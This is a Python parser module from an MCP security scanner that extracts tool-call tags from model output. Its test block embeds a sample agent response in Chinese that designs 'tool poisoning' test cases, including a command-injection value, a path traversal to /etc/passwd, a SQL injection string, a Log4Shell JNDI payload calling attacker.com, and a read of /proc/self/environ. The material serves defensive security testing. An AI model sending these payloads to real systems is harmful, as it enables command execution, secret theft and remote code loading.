/ mcp-scan / utils / parse.py
parse.py
  1  # Copyright (c) 2024-2026 Tencent Zhuque Lab. All rights reserved.
  2  #
  3  # Licensed under the Apache License, Version 2.0 (the "License");
  4  # you may not use this file except in compliance with the License.
  5  # You may obtain a copy of the License at
  6  #
  7  #     http://www.apache.org/licenses/LICENSE-2.0
  8  #
  9  # Unless required by applicable law or agreed to in writing, software
 10  # distributed under the License is distributed on an "AS IS" BASIS,
 11  # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 12  # See the License for the specific language governing permissions and
 13  # limitations under the License.
 14  #
 15  # Requirement: Any integration or derivative work must explicitly attribute
 16  # Tencent Zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) in its
 17  # documentation or user interface, as detailed in the NOTICE file.
 18  
 19  import html
 20  import re
 21  from typing import Any
 22  
 23  
 24  def _parse_tags(content: str, tag_name: str) -> list[dict[str, Any]]:
 25      results = []
 26      regex_pattern = f"<{tag_name}=([^>]+)>\n?(.*?)</{tag_name}.*?>"
 27      param_regex_pattern = r"<parameter=([^>]+)>(.*?)</parameter>"
 28  
 29      matches = re.finditer(regex_pattern, content, re.DOTALL)
 30      for match in matches:
 31          fn_name = match.group(1)
 32          if fn_name == "tool_name":  # Skip few-shot examples
 33              continue
 34  
 35          body = match.group(2)
 36          param_matches = re.finditer(param_regex_pattern, body, re.DOTALL)
 37  
 38          args = {}
 39          for param_match in param_matches:
 40              p_name = param_match.group(1)
 41              p_value = html.unescape(param_match.group(2).strip())
 42              args[p_name] = p_value
 43  
 44          results.append({"toolName": fn_name, "args": args})
 45      return results
 46  
 47  
 48  def parse_tool_invocations(content: str) -> dict[str, Any] | None:
 49      invocations = _parse_tags(content, "function")
 50      if not invocations and content:
 51          finish_match = re.search(
 52              r"<finish>\s*(.*?)\s*</finish>", content, re.DOTALL | re.IGNORECASE
 53          )
 54          if finish_match:
 55              invocations = [
 56                  {
 57                      "toolName": "finish",
 58                      "args": {"content": html.unescape(finish_match.group(1).strip())},
 59                  }
 60              ]
 61      return invocations[0] if invocations else None
 62  
 63  
 64  def parse_mcp_invocations(content: str) -> list[dict[str, Any]] | None:
 65      invocations = _parse_tags(content, "mcp_function")
 66      return invocations if invocations else None
 67  
 68  
 69  def clean_content(content: str) -> str:
 70      if not content:
 71          return ""
 72      hidden_xml_patterns = [
 73          r"<function=[^>]+>.*?</function.*?>",
 74          r"<finish>.*?</finish>",
 75          r"<mcp_function=[^>]+>.*?</mcp_function.*?>",
 76          r"<inter_agent_message>.*?</inter_agent_message>",
 77      ]
 78      cleaned = content
 79      for pattern in hidden_xml_patterns:
 80          cleaned = re.sub(pattern, "", cleaned, flags=re.DOTALL | re.IGNORECASE)
 81  
 82      cleaned = re.sub(r"\n\s*\n", "\n\n", cleaned)
 83  
 84      return cleaned.strip()
 85  
 86  
 87  if __name__ == "__main__":
 88      sample_text = """
 89          The current round is the 3th conversation. Please try to minimize the number of exchanges to obtain the result. 始终遵循输出格式。
 90          返回结果如下:
 91  
 92  
 93          <tool_name>think</tool_name><tool_result><success>True</success>
 94          <thought_input>需要为工具投毒攻击生成测试用例,重点关注:
 95          1. 命令执行:测试工具是否能执行系统命令
 96          2. 路径遍历:测试参数注入和路径遍历
 97          3. SQL注入:测试SQL注入可能性
 98          4. 日志注入:测试恶意日志注入
 99          5. 文件系统访问:测试未授权文件访问
100          6. 权限提升:测试是否能获取更高权限信息</thought_input>
101          <thinking_result>好的,我们来对“工具投毒 (Tool Poisoning)”的测试场景进行深度分析,并围绕你提出的六个重点生成测试用例。
102  
103          ### 1. 问题分析
104  
105          "工具投毒"的核心是工具的**实现本身是恶意的**。然而,在黑盒测试中,我们无法直接修改工具代码。因此,测试策略转变为:**通过构造恶意输入,探测工具是否存在可被利用的漏洞**。这些漏洞与一个被投毒的工具可能执行的恶意行为(如命令执行、文件访问)是高度一致的。
106  
107          这种测试方式服务于两个目的:
108          1.  **检测工具本身的安全漏洞**:一个健壮的工具应该能正确处理或拒绝这些恶意输入,而不是执行它们。
109          2.  **验证执行环境的安全性**:即使工具存在漏洞,一个安全的沙箱环境也应该能阻止其后续的恶意行为(如访问文件系统、发起网络连接)。
110  
111          我们将围绕你提出的六个关注点展开分析:
112  
113          *   **命令执行**: 用户输入是否可能被拼接并作为shell命令执行?
114          *   **路径遍历/文件系统访问**: 用户输入是否可能被用于拼接文件路径,从而访问到预期之外的文件?
115          *   **SQL注入**: 如果工具后端是数据库,用户输入是否可能被拼接到SQL查询中,从而操纵数据库?
116          *   **日志注入**: 恶意输入是否会污染日志文件,可能用于混淆视听、注入恶意字符甚至触发更严重的漏洞(如Log4Shell)?
117          *   **权限提升**: 是否可以通过特殊输入(如'admin')骗取工具返回更高的权限,或者获取敏感配置信息?
118  
119          ### 2. 可能的解决方案 (测试用例设计)
120  
121          以下测试用例旨在通过恶意输入,模拟和探测上述风险点。
122  
123          | **测试目标** | **用例ID** | **调用工具及参数** | **攻击原理与预期** |
124          | :--- | :--- | :--- | :--- |
125          | **命令执行** | TC-TP-006 | `get_user_role(username='; ls -la /')` | **原理**: 测试工具是否将输入直接拼接到系统命令中。**预期**: 如果有漏洞,可能会执行`ls`命令。安全的系统应拒绝输入或返回错误,沙箱应阻止命令执行。 |
126          | **路径遍历** | TC-TP-007 | `get_user_role(username='../../../../etc/passwd')` | **原理**: 测试工具是否将输入作为文件名的一部分,并存在路径遍历漏洞。**预期**: 尝试读取系统敏感文件。安全的系统应规范化路径或拒绝请求,沙箱应阻止文件访问。 |
127          | **SQL注入** | TC-TP-008 | `get_user_roles(username="' OR '1'='1' --")` | **原理**: 测试后端数据库查询是否易受SQL注入攻击。**预期**: 可能返回所有用户角色,而非单个用户。安全的系统应使用参数化查询,拒绝此输入。 |
128          | **日志注入/RCE** | TC-TP-009 | `get_user_role(username='${jndi:ldap://attacker.com/a}')` | **原理**: 模拟Log4Shell攻击。如果工具使用存在漏洞的日志库记录输入,可能触发远程代码执行。**预期**: 系统应阻止向`attacker.com`发起网络连接。 |
129          | **文件系统访问** | TC-TP-010 | `get_user_role(username='/proc/self/environ')` | **原理**: 尝试读取进程的环境变量,可能泄露密钥等敏感信息。**预期**: 沙箱的文件访问控制应阻止对`/proc`文件系统的读取。 |
130          | **权限提升** | TC-TP-011 | `get_user_role(username='admin')` | **原理**: 探测最直接的提权方式,看是否能通过简单输入获得高级别角色信息。**预期**: 工具应返回'admin'用户的正确角色,上层应用不应仅凭此输出就授予权限。 |
131  
132          ### 3. 潜在风险和注意事项
133  
134          1.  **必须在沙箱中执行**: 这些测试用例包含真实的攻击载荷,直接在生产系统上运行是极其危险的,可能导致系统被破坏或数据泄露。
135          2.  **监控是关键**: 测试的价值在于观察结果。你必须监控并能够分析文件访问、网络连接、进程创建和系统日志,以判断攻击是否成功以及是否被正确阻断。
136          3.  **非穷尽性测试**: 这些用例是代表性的,但不是全部。攻击者会使用更复杂的编码和混淆技术来绕过简单的过滤器。
137          4.  **防御深度**: 理想的安全状态是多层防御。第一层是工具本身能正确验证和净化输入;第二层是执行环境(沙箱)能限制工具的权限,阻止恶意行为。
138  
139          ### 4. 推荐的行动步骤
140  
141          1.  **准备环境**: 部署你的应用及其工具到一个配置了监控和安全策略(如文件访问、网络白名单)的隔离沙箱中。
142          2.  **执行测试**: 按顺序执行下面生成的工具调用。
143          3.  **观察与记录**:
144              *   **命令执行用例**: 检查是否有非预期的进程(如`ls`)被创建。
145              *   **文件访问用例**: 检查安全日志中是否有文件访问被拒绝的记录。
146              *   **网络用例 (JNDI)**: 检查防火墙或网络监控日志中是否有向外的LDAP连接尝试,并确认其被阻止。
147              *   **工具返回值**: 记录每个调用的返回结果,看是否与预期一致(如SQL注入是否返回了所有用户)。
148          4.  **分析与加固**:
149              *   如果任何恶意行为成功执行,说明工具或沙箱存在漏洞。
150              *   **加固工具**: 增加严格的输入验证和净化逻辑。
151              *   **加固环境**: 收紧沙箱权限,实施更严格的文件和网络访问策略,确保权限最小化原则。
152  
153          现在,我将生成对应的工具调用以执行测试。
154  
155          <mcp_tool_calls>
156          <mcp_function>
157              <tool_name>get_user_role</tool_name>
158              <parameters>
159              <username>; ls -la /</username>
160              </parameters>
161          </mcp_function>
162          <mcp_function>
163              <tool_name>get_user_role</tool_name>
164              <parameters>
165              <username>../../../../etc/passwd</username>
166              </parameters>
167          </mcp_function>
168          <mcp_function>
169              <tool_name>get_user_roles</tool_name>
170              <parameters>
171              <username>' OR '1'='1' --</username>
172              </parameters>
173          </mcp_function>
174          <mcp_function>
175              <tool_name>get_user_role</tool_name>
176              <parameters>
177              <username>${jndi:ldap://attacker.com/a}</username>
178              </parameters>
179          </mcp_function>
180          <mcp_function>
181              <tool_name>get_user_role</tool_name>
182              <parameters>
183              <username>/proc/self/environ</username>
184              </parameters>
185          </mcp_function>
186          <mcp_function>
187              <tool_name>get_user_role</tool_name>
188              <parameters>
189              <username>admin</username>
190              </parameters>
191          </mcp_function>
192          </mcp_tool_calls></thinking_result>
193          </tool_result>
194              我将生成工具投毒攻击的测试用例,重点关注命令执行、路径遍历、SQL注入等安全风险。
195  
196          <function=finish>
197          <parameter=content>## 工具投毒攻击测试报告
198  
199          ### 执行摘要
200          针对get_user_role和get_user_roles工具进行了投毒攻击测试,模拟工具被篡改后可能执行的恶意行为。
201  
202          ### 测试用例设计
203          基于工具投毒攻击场景,设计了以下测试用例:
204  
205          #### 1. 命令执行测试
206          - 测试工具是否可能执行系统命令
207          - 用例:`get_user_role(username='; ls -la /')`
208          - 预期:系统应拒绝输入或返回错误,沙箱应阻止命令执行
209  
210          #### 2. 路径遍历测试  
211          - 测试文件路径注入漏洞
212          - 用例:`get_user_role(username='../../../../etc/passwd')`
213          - 预期:安全系统应规范化路径或拒绝请求
214  
215          #### 3. SQL注入测试
216          - 测试数据库查询注入可能性
217          - 用例:`get_user_roles(username="' OR '1'='1' --")`
218          - 预期:应使用参数化查询,拒绝恶意输入
219  
220          #### 4. 日志注入/RCE测试
221          - 测试Log4Shell类型攻击
222          - 用例:`get_user_role(username='${jndi:ldap://attacker.com/a}')`
223          - 预期:系统应阻止向外网发起LDAP连接
224  
225          #### 5. 文件系统访问测试
226          - 测试未授权文件读取
227          - 用例:`get_user_role(username='/proc/self/environ')`
228          - 预期:沙箱应阻止对敏感文件的访问
229  
230          #### 6. 权限提升测试
231          - 测试通过特殊输入获取更高权限
232          - 用例:`get_user_role(username='admin')`
233          - 预期:工具应返回正确角色信息,不应直接授予权限
234  
235          ### 风险等级
236          - **高危**: 命令执行、路径遍历
237          - **中危**: SQL注入、日志注入  
238          - **低危**: 正常权限查询
239  
240          ### 测试环境要求
241          - 必须在隔离沙箱环境中执行测试
242          - 需要监控文件访问、网络连接和进程创建
243          - 需要配置安全策略和访问控制
244  
245          ### 结论
246          通过系统性地测试各种恶意输入场景,可以有效评估工具在面对投毒攻击时的安全性和鲁棒性。</parameter>
247          </function>
248      """
249      result = parse_mcp_invocations(sample_text)
250      print(result)